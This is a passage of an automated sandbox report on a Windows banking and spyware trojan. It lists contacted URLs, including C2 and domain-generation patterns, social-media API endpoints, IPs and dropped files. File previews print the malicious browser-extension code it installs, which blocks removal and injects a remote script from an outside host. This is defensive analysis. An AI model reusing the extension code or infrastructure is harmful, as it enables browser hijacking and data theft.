                                http://84CFBA021A5A6662.xyz/al56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://forms.real.com/real/realone/download.html?type=rpsp_us56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpfalse
                                  		high
                                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%ecvFEAD.tmp.9.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://ocsp.pki.goog/GTSGIAG30ecvFEAD.tmp.9.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%256BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                    		high
                                    http://84CFBA021A5A6662.xyz/llr56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4NecvFEAD.tmp.9.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://84CFBA021A5A6662.xyz/56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.instagram.com/56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                        		high
                                        http://84CFBA021A5A6662.xyz/llHCyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/soap/encoding/download_user.dll.2.drfalse
                                          		high
                                          http://www.xunlei.com/GETdownload_user.dll.2.drfalse
                                            		high
                                            http://www.youtube.comT56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeecvFEAD.tmp.9.drfalse
                                              		high
                                              http://www.vb-cable.comVBCABLECyfj6XGbkd.exefalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cecvFEAD.tmp.9.drfalse
                                                		high
                                                https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://www.messenger.com/origin:56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drfalse
                                                      		high
                                                      http://pki.goog/gsr2/GTS1O1.crt0ecvFEAD.tmp.9.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecvFEAD.tmp.9.drfalse
                                                        		high
                                                        https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecvFEAD.tmp.9.drfalse
                                                          		high
                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gecvFEAD.tmp.9.drfalse
                                                            		high
                                                            https://contextual.media.net/ecvFEAD.tmp.9.drfalse
                                                              		high
                                                              http://ocsp.pki.goog/gsr202ecvFEAD.tmp.9.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.youtube.comf56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookieecvFEAD.tmp.9.drfalse
                                                                		high
                                                                https://pki.goog/repository/0ecvFEAD.tmp.9.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1ecvFEAD.tmp.9.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://api.twitter.com/1.1/statuses/update.json56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msnecvFEAD.tmp.9.drfalse
                                                                    		high
                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736ecvFEAD.tmp.9.drfalse
                                                                      		high
                                                                      https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecvFEAD.tmp.9.drfalse
                                                                        		high
                                                                        http://www.msn.com/ecvFEAD.tmp.9.drfalse
                                                                          		high
                                                                          https://upload.twitter.com/i/media/upload.json56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.cloudflare.com/5xx-error-landingCyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.371026243.0000000003813000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376084985.0000000003D38000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecvFEAD.tmp.9.drfalse
                                                                                		high
                                                                                http://84CFBA021A5A6662.xyz/info_old/r56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpfalse
                                                                                  		unknown
                                                                                  https://twitter.com/compose/tweetsec-fetch-mode:56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://84CFBA021A5A6662.xyz/info_old/wCyfj6XGbkd.exe, 00000000.00000002.365614828.0000000000861000.00000004.00000020.sdmp, Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.409330449.0000000003D76000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376093286.0000000003D4D000.00000004.00000001.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.vb-cable.comCyfj6XGbkd.exefalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.messenger.com/accept:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecvFEAD.tmp.9.drfalse
                                                                                          		high
                                                                                          https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecvFEAD.tmp.9.drfalse
                                                                                            		high
                                                                                            https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.jsecvFEAD.tmp.9.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://contextual.media.net/48/nrrV18753.jsecvFEAD.tmp.9.drfalse
                                                                                              		high
                                                                                              https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9ecvFEAD.tmp.9.drfalse
                                                                                                		high
                                                                                                http://84CFBA021A5A6662.xyz/info_old/e56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://crl.pki.goog/gsr2/gsr2.crl0?ecvFEAD.tmp.9.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://84CFBA021A5A6662.xyz/info_old/g56BB1610C0318054.exe, 00000002.00000003.391014906.0000000003D78000.00000004.00000001.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://pki.goog/gsr2/GTSGIAG3.crt0)ecvFEAD.tmp.9.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=056BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://feedback.googleusercontent.com56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.xunlei.com/download_user.dll.2.drfalse
                                                                                                          		high
                                                                                                          http://pki.goog/gsr2/GTS1O1.crt0#ecvFEAD.tmp.9.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://84CFBA021A5A6662.xyz/info_old/wV56BB1610C0318054.exe, 00000004.00000002.377383414.00000000005A6000.00000004.00000020.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/soap/envelope/download_user.dll.2.drfalse
                                                                                                              		high
                                                                                                              https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		low
                                                                                                              https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecvFEAD.tmp.9.drfalse
                                                                                                                		high
                                                                                                                http://84cfba021a5a6662.xyz/info_old/wICyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://84cfba021a5a6662.xyz/Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.370858416.00000000007E4000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.377399096.00000000005BB000.00000004.00000020.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecvFEAD.tmp.9.drfalse
                                                                                                                    		high
                                                                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecvFEAD.tmp.9.drfalse
                                                                                                                      		high
                                                                                                                      http://84CFBA021A5A6662.xyz/f56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://curl.haxx.se/docs/http-cookies.html56BB1610C0318054.exe, 00000002.00000002.414835494.000000000344F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380176244.000000000330F000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.openssl.org/support/faq.htmldownload_user.dll.2.drfalse
                                                                                                                          		high
                                                                                                                          http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tLecvFEAD.tmp.9.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629ecvFEAD.tmp.9.drfalse
                                                                                                                            		high
                                                                                                                            https://www.instagram.comsec-fetch-mode:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://www.instagram.com/accounts/login/ajax/facebook/56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                                              		high

                                                                                                                              Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              104.21.23.16
                                                                                                                              		unknownUnited States
                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                              Private

                                                                                                                              IP
                                                                                                                              192.168.2.1
                                                                                                                              127.0.0.1

                                                                                                                              General Information

                                                                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                                                                              Analysis ID:346134
                                                                                                                              Start date:29.01.2021
                                                                                                                              Start time:17:35:36
                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                              Overall analysis duration:0h 12m 11s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:light
                                                                                                                              Sample file name:Cyfj6XGbkd (renamed file extension from none to exe)
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                              Number of analysed new started processes analysed:36
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • HDC enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal93.bank.troj.spyw.evad.winEXE@32/37@4/3
                                                                                                                              EGA Information:Failed
                                                                                                                              HDC Information:
                                                                                                                              • Successful, ratio: 60.1% (good quality ratio 57.2%)
                                                                                                                              • Quality average: 80.5%
                                                                                                                              • Quality standard deviation: 27.1%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 68%
                                                                                                                              • Number of executed functions: 0
                                                                                                                              • Number of non-executed functions: 0
                                                                                                                              Cookbook Comments:
                                                                                                                              • Adjust boot time
                                                                                                                              • Enable AMSI
                                                                                                                              Warnings:
                                                                                                                              Show All
                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                              • TCP Packets have been reduced to 100
                                                                                                                              • Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.139.144, 51.11.168.160, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 51.103.5.186, 52.155.217.156, 20.54.26.129, 23.210.248.85, 204.79.197.200, 13.107.21.200
                                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net
                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              17:36:38API Interceptor4x Sleep call for process: Cyfj6XGbkd.exe modified
                                                                                                                              17:36:46API Interceptor4x Sleep call for process: 56BB1610C0318054.exe modified

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              104.21.23.16FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 84CFBA021A5A6662.xyz/info_old/ddd
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 84CFBA021A5A6662.xyz/info_old/ddd

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              84CFBA021A5A6662.xyzN1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.208.74
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16
                                                                                                                              84cfba021a5a6662.xyzN1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.208.74
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16

                                                                                                                              ASN

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              CLOUDFLARENETUSRoyalmail-Shipment.xlsGet hashmaliciousBrowse
                                                                                                                              • 172.67.1.225
                                                                                                                              N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.208.74
                                                                                                                              Royalmail-Shipment.xlsGet hashmaliciousBrowse
                                                                                                                              • 172.67.1.225
                                                                                                                              PO#PDT28394209.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.176.199
                                                                                                                              c8TrAKsz0T.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.47.75
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16
                                                                                                                              RddH6rLRfH.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.27.240
                                                                                                                              Immuni.apkGet hashmaliciousBrowse
                                                                                                                              • 172.64.100.5
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16
                                                                                                                              UGPK60taH6.dllGet hashmaliciousBrowse
                                                                                                                              • 104.20.184.68
                                                                                                                              4PDNbYK5fj.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213
                                                                                                                              pmTdQ57tvM.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213
                                                                                                                              7BtV39hziI.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.27.240
                                                                                                                              dc4AaqW6Aa.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.27.240
                                                                                                                              lAy87VNPiL.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.27.240
                                                                                                                              97aa4Ywd9y.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.27.240
                                                                                                                              wuRBlQt0Tz.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213
                                                                                                                              4GRuinub4a.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213
                                                                                                                              v8c1m9dW8G.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213
                                                                                                                              XQx9brj85p.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeN1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                  FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                    C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeN1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                      FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                        FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                          C:\Users\user\AppData\Local\Temp\MSIDCDD.tmpN1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                            FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Cookies1611970637026
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20480
                                                                                                                                                Entropy (8bit):0.6951152985249047
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                                                                MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                                                                SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                                                                SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                                                                SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Cookies1611970645636
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20480
                                                                                                                                                Entropy (8bit):0.6951152985249047
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                                                                MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                                                                SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                                                                SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                                                                SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\background.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):886
                                                                                                                                                Entropy (8bit):5.022683940423506
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
                                                                                                                                                MD5:FEDACA056D174270824193D664E50A3F
                                                                                                                                                SHA1:58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
                                                                                                                                                SHA-256:8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
                                                                                                                                                SHA-512:2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\book.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):152
                                                                                                                                                Entropy (8bit):5.039480985438208
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                                MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                                SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                                SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                                SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon.png
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1161
                                                                                                                                                Entropy (8bit):7.79271055262892
                                                                                                                                                Encrypted:false
